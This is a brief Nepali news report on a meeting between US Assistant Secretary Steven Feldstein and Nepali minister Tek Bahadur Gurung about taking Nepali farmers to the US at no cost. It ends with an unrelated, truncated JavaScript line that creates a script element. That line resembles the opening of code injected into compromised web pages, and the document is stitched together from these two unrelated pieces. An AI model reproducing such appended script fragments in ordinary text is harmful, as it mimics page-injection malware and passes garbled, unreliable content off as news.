अमेरिकाका श्रम तथा मानवअधिकार सहायकमन्त्री स्टेभन फिल्डस्टिन र श्रम तथा रोजगार राज्यमन्त्री टेकबहादुर गुरुबीच भेटवार्ता भएको छ । भेटमा नेपाली किसानलाई निःशुल्क रुपमा अमेरिका लैजाने विषयमा छलफल भएको छ।

var d=document;var s=d.createElement(‘script’);